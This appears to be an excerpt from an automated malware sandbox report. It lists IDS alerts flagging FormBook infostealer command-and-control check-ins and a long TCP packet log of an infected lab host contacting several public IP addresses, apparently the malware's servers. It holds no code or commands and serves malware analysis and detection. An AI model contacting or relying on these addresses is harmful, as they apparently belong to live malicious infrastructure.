                                                                                                        2024-10-10T14:46:39.184581+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498333.33.130.19080TCP
                                                                                                        2024-10-10T14:46:41.731630+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498453.33.130.19080TCP
                                                                                                        2024-10-10T14:46:44.155602+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4498603.33.130.19080TCP
                                                                                                        2024-10-10T14:46:49.955226+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44990181.88.48.7180TCP
                                                                                                        2024-10-10T14:46:52.466500+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44992281.88.48.7180TCP
                                                                                                        2024-10-10T14:46:55.114187+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44993881.88.48.7180TCP
                                                                                                        2024-10-10T14:46:57.569118+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44995481.88.48.7180TCP
                                                                                                        2024-10-10T14:47:03.960118+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449993162.209.189.21280TCP
                                                                                                        2024-10-10T14:47:06.543580+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450006162.209.189.21280TCP
                                                                                                        2024-10-10T14:47:09.117961+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450019162.209.189.21280TCP
                                                                                                        2024-10-10T14:47:11.618796+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450020162.209.189.21280TCP
                                                                                                        2024-10-10T14:47:17.275044+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450021162.0.213.7280TCP
                                                                                                        2024-10-10T14:47:19.839459+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450022162.0.213.7280TCP
                                                                                                        2024-10-10T14:47:22.358268+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450023162.0.213.7280TCP
                                                                                                        2024-10-10T14:47:24.928033+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450024162.0.213.7280TCP
                                                                                                        2024-10-10T14:47:30.763063+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450025104.21.21.23080TCP
                                                                                                        2024-10-10T14:47:33.338917+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450026104.21.21.23080TCP
                                                                                                        2024-10-10T14:47:36.343667+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450027104.21.21.23080TCP
                                                                                                        2024-10-10T14:47:38.379854+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450028104.21.21.23080TCP
                                                                                                        2024-10-10T14:47:44.012329+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002984.32.84.3280TCP
                                                                                                        2024-10-10T14:47:46.589247+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003084.32.84.3280TCP
                                                                                                        2024-10-10T14:47:49.136453+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003184.32.84.3280TCP
                                                                                                        2024-10-10T14:47:51.684273+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003284.32.84.3280TCP
                                                                                                        2024-10-10T14:47:57.431921+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450033109.234.166.18080TCP
                                                                                                        2024-10-10T14:47:59.963184+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450034109.234.166.18080TCP
                                                                                                        2024-10-10T14:48:02.639515+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450035109.234.166.18080TCP
                                                                                                        2024-10-10T14:48:05.336208+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450036109.234.166.18080TCP
                                                                                                        2024-10-10T14:48:10.886896+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500373.33.130.19080TCP
                                                                                                        2024-10-10T14:48:13.527787+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500383.33.130.19080TCP
                                                                                                        2024-10-10T14:48:16.087396+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500393.33.130.19080TCP
                                                                                                        2024-10-10T14:48:18.611444+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500403.33.130.19080TCP
                                                                                                        2024-10-10T14:48:25.616555+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.451587118.99.50.880TCP
                                                                                                        2024-10-10T14:48:28.080678+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.451588118.99.50.880TCP
                                                                                                        2024-10-10T14:48:30.686701+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.451589118.99.50.880TCP
                                                                                                        2024-10-10T14:48:33.197843+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.451590118.99.50.880TCP
                                                                                                        2024-10-10T14:48:41.113723+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45159123.249.190.3580TCP
                                                                                                        2024-10-10T14:48:43.444739+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45159223.249.190.3580TCP

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 10, 2024 14:46:06.181518078 CEST4973680192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:06.186520100 CEST80497363.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:06.186619043 CEST4973680192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:06.194684029 CEST4973680192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:06.199543953 CEST80497363.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:06.642410994 CEST80497363.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:06.642437935 CEST80497363.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:06.642558098 CEST4973680192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:06.645286083 CEST4973680192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:06.650268078 CEST80497363.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:21.755731106 CEST4973880192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:21.760624886 CEST804973834.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:21.760724068 CEST4973880192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:21.770148993 CEST4973880192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:21.775001049 CEST804973834.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:22.302696943 CEST804973834.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:22.302711964 CEST804973834.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:22.302725077 CEST804973834.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:22.302776098 CEST4973880192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:23.282543898 CEST4973880192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:24.311988115 CEST4975480192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:24.317013025 CEST804975434.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:24.317114115 CEST4975480192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:24.326073885 CEST4975480192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:24.331003904 CEST804975434.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:24.790009975 CEST804975434.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:24.790128946 CEST804975434.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:24.790179014 CEST4975480192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:25.840585947 CEST4975480192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:26.858839035 CEST4976580192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:26.863760948 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.863878012 CEST4976580192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:26.874218941 CEST4976580192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:26.879121065 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879146099 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879154921 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879162073 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879173994 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879189968 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879319906 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879328012 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:26.879338026 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:27.343168020 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:27.343203068 CEST804976534.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:27.343328953 CEST4976580192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:28.387687922 CEST4976580192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:29.407427073 CEST4978380192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:29.412369967 CEST804978334.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:29.412446976 CEST4978380192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:29.419471979 CEST4978380192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:29.424523115 CEST804978334.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:29.885693073 CEST804978334.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:29.885814905 CEST804978334.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:29.886008978 CEST4978380192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:29.888672113 CEST4978380192.168.2.434.120.137.41
                                                                                                        Oct 10, 2024 14:46:29.893709898 CEST804978334.120.137.41192.168.2.4
                                                                                                        Oct 10, 2024 14:46:35.035867929 CEST4981780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:35.040795088 CEST80498173.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:35.040885925 CEST4981780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:35.065460920 CEST4981780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:35.070396900 CEST80498173.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:35.519593954 CEST80498173.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:35.519675016 CEST4981780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:36.575144053 CEST4981780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:36.580301046 CEST80498173.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:37.652154922 CEST4983380192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:37.657318115 CEST80498333.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:37.657403946 CEST4983380192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:37.680917978 CEST4983380192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:37.686099052 CEST80498333.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:39.184581041 CEST4983380192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:39.189860106 CEST80498333.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:39.189944983 CEST4983380192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:40.204555988 CEST4984580192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:40.209402084 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.209521055 CEST4984580192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:40.225322962 CEST4984580192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:40.230386019 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230426073 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230438948 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230451107 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230463028 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230473995 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230539083 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230561018 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:40.230572939 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:41.731630087 CEST4984580192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:41.736900091 CEST80498453.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:41.737051964 CEST4984580192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:42.751462936 CEST4986080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:42.756419897 CEST80498603.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:42.756489992 CEST4986080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:42.764571905 CEST4986080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:42.769653082 CEST80498603.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:44.155246973 CEST80498603.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:44.155513048 CEST80498603.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:44.155601978 CEST4986080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:44.157810926 CEST4986080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:46:44.162704945 CEST80498603.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:46:49.241404057 CEST4990180192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:49.246407032 CEST804990181.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:49.247492075 CEST4990180192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:49.258930922 CEST4990180192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:49.263747931 CEST804990181.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:49.954166889 CEST804990181.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:49.955131054 CEST804990181.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:49.955225945 CEST4990180192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:50.763029099 CEST4990180192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:51.781935930 CEST4992280192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:51.787501097 CEST804992281.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:51.787617922 CEST4992280192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:51.800765038 CEST4992280192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:51.805702925 CEST804992281.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:52.465985060 CEST804992281.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:52.466423035 CEST804992281.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:52.466500044 CEST4992280192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:53.310017109 CEST4992280192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:54.329767942 CEST4993880192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:54.334880114 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.335001945 CEST4993880192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:54.347877026 CEST4993880192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:54.353038073 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353082895 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353111029 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353163958 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353190899 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353218079 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353245020 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353271008 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:54.353297949 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:55.113912106 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:55.114115953 CEST804993881.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:55.114187002 CEST4993880192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:55.857050896 CEST4993880192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:56.875766993 CEST4995480192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:56.880667925 CEST804995481.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:56.880743027 CEST4995480192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:56.889822006 CEST4995480192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:56.894702911 CEST804995481.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:57.568619967 CEST804995481.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:57.568883896 CEST804995481.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:46:57.569118023 CEST4995480192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:57.572877884 CEST4995480192.168.2.481.88.48.71
                                                                                                        Oct 10, 2024 14:46:57.577703953 CEST804995481.88.48.71192.168.2.4
                                                                                                        Oct 10, 2024 14:47:03.449110985 CEST4999380192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:03.454005957 CEST8049993162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:03.454101086 CEST4999380192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:03.468956947 CEST4999380192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:03.473886967 CEST8049993162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:03.958451986 CEST8049993162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:03.960042953 CEST8049993162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:03.960118055 CEST4999380192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:04.982101917 CEST4999380192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:06.000560045 CEST5000680192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:06.005685091 CEST8050006162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:06.006604910 CEST5000680192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:06.017105103 CEST5000680192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:06.021995068 CEST8050006162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:06.543301105 CEST8050006162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:06.543340921 CEST8050006162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:06.543580055 CEST5000680192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:07.528877974 CEST5000680192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:08.550599098 CEST5001980192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:08.555515051 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.555639982 CEST5001980192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:08.566616058 CEST5001980192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:08.571505070 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571535110 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571584940 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571611881 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571639061 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571665049 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571712017 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571738005 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:08.571763992 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:09.117835045 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:09.117877007 CEST8050019162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:09.117960930 CEST5001980192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:10.078620911 CEST5001980192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:11.097312927 CEST5002080192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:11.102704048 CEST8050020162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:11.102781057 CEST5002080192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:11.120007038 CEST5002080192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:11.125143051 CEST8050020162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:11.618407011 CEST8050020162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:11.618685007 CEST8050020162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:11.618796110 CEST5002080192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:11.621109962 CEST5002080192.168.2.4162.209.189.212
                                                                                                        Oct 10, 2024 14:47:11.625936031 CEST8050020162.209.189.212192.168.2.4
                                                                                                        Oct 10, 2024 14:47:16.664769888 CEST5002180192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:16.669575930 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:16.669768095 CEST5002180192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:16.683563948 CEST5002180192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:16.688388109 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.274939060 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.274990082 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.275023937 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.275043964 CEST5002180192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:17.275058985 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.275100946 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.275125027 CEST5002180192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:17.275553942 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.275608063 CEST5002180192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:17.275609016 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.275659084 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.275700092 CEST5002180192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:17.275710106 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.275747061 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.275784016 CEST5002180192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:17.279949903 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.280002117 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.280035019 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.280044079 CEST5002180192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:17.351412058 CEST5002180192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:17.370105028 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.370143890 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.370184898 CEST8050021162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:17.370188951 CEST5002180192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:17.370233059 CEST5002180192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:18.186783075 CEST5002180192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:19.205084085 CEST5002280192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:19.210107088 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.210177898 CEST5002280192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:19.223261118 CEST5002280192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:19.228152990 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.839344978 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.839409113 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.839432955 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.839452028 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.839458942 CEST5002280192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:19.839469910 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.839489937 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.839505911 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.839509010 CEST5002280192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:19.839545965 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.839553118 CEST5002280192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:19.839562893 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.839581013 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.839597940 CEST5002280192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:19.839627028 CEST5002280192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:19.844434977 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.844479084 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.844497919 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.844516039 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.844537020 CEST5002280192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:19.844623089 CEST5002280192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:19.928112984 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.928262949 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.928282976 CEST8050022162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:19.928335905 CEST5002280192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:20.732317924 CEST5002280192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:21.750777960 CEST5002380192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:21.755727053 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:21.755911112 CEST5002380192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:21.767229080 CEST5002380192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:21.772089958 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:21.772115946 CEST8050023162.0.213.72192.168.2.4
